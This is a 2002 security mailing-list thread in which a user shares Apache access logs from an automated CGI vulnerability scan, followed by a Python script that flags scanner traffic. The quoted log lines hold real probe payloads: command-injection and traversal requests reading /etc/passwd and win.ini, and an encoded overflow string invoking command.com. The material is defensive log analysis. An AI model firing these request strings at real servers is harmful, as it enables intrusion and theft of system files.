This is a web scan, or a CGI scan, or, as far as we can tell, a script kiddie's attempt.
Sorry for my poor English. Best regards,
"Let whoever has never pirated throw the first disc;
I'll throw a copy"
===================
Sp0oKeR - NsC
Analista Linux / Security
spooker@bol.com.br
====================
----- Original Message -----
From: Charles Funderburk
To:
Sent: Wednesday, July 10, 2002 3:04 PM
Subject: [suse-security] Possible Apache Exploit?
Hello all,
I am new to the list and have gained a ton from reading all the comments and suggestions. I thought someone might be able to help me out and give me their two cents on something I noticed in my Apache access logs. Looks like a buffer overflow intended for an NT machine.
0.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET file://etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=NAI+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404 299
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404 283
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /mlog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /php/mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304
I haven't seen any of the code for the latest Apache chunk exploit. Anyone have any ideas or suggestions?
Thanks!
-Charles
--
To unsubscribe, e-mail: suse-security-unsubscribe@suse.com
For additional commands, e-mail: suse-security-help@suse.com
Security-related bug reports go to security@suse.de, not here
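The reply's diagnosis ("this is a web scan") can be turned into a repeatable check. The following Python script is an added example, not code from either poster or from the suse-security list: it parses Apache Common Log Format lines, URL-decodes each request path, matches it against a small set of probe signatures visible in Charles's log (the CyberCop marker files, /etc/passwd reads, directory traversal, Windows system files, legacy CGI directories), and flags a source address that fires many error responses in a short window. The sample lines are copied from the post above with the mail wrapping undone, plus one constructed benign request from 192.0.2.10 (documentation range) to show a non-scanner client; the signature names, thresholds and report layout are this example's own choices.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample: entries from the access log in the post (wrapping undone)
# plus one benign request from a documentation-range address.
SAMPLE_LOG = r"""
10.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET file://etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304
192.0.2.10 - - [10/Jul/2002:01:07:00 -0500] "GET /index.html HTTP/1.0" 200 1350
"""

# Apache Common Log Format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Signature names are this example's own labels, matched against the decoded path.
SIGNATURES = [
    ("cybercop-scanner-marker", re.compile(r"cybercop", re.I)),
    ("etc-passwd-read", re.compile(r"/etc/passwd", re.I)),
    ("directory-traversal", re.compile(r"(\.\./|\.\.\\)")),
    ("windows-system-file", re.compile(r"(win\.ini|command\.com)", re.I)),
    ("legacy-cgi-probe", re.compile(r"/cgi-(bin|shl|win)/", re.I)),
]


def parse_line(line):
    """Parse one CLF line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = m.group("req").split()          # request line may lack the HTTP version
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": parts[0] if parts else "",
        "path": parts[1] if len(parts) > 1 else "",
        "status": int(m.group("status")),
    }


def classify_path(path):
    """Return the names of every signature the URL-decoded path matches."""
    decoded = unquote(path)                  # so ..%2f and %20 are seen as ../ and space
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def analyze(log_text, window_seconds=60, min_requests=8, min_error_ratio=0.5):
    """Group requests by client and report signature hits and error bursts per client."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    report = {}
    for ip, recs in per_ip.items():
        tags = set()
        for r in recs:
            tags.update(classify_path(r["path"]))
        errors = sum(1 for r in recs if r["status"] >= 400)
        span = (max(r["ts"] for r in recs) - min(r["ts"] for r in recs)).total_seconds()
        # A burst is many requests in a short window where most of them fail:
        # the shape of a scanner walking a list of paths that do not exist here.
        burst = (len(recs) >= min_requests and span <= window_seconds
                 and errors / len(recs) >= min_error_ratio)
        report[ip] = {
            "requests": len(recs),
            "errors": errors,
            "span_seconds": span,
            "signatures": sorted(tags),
            "burst": burst,
            "scanner": burst or bool(tags),
        }
    return report


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        verdict = "SCANNER" if info["scanner"] else "ok"
        print(f"{ip:15} {verdict:8} {info['requests']} req, {info['errors']} errors "
              f"in {info['span_seconds']:.0f}s, signatures={info['signatures']}")
```

Run it against a real access_log by replacing SAMPLE_LOG with the file contents; the signature list is deliberately short and should be extended with the paths your own scanner hits show, while the burst rule catches new probe lists that no signature names yet.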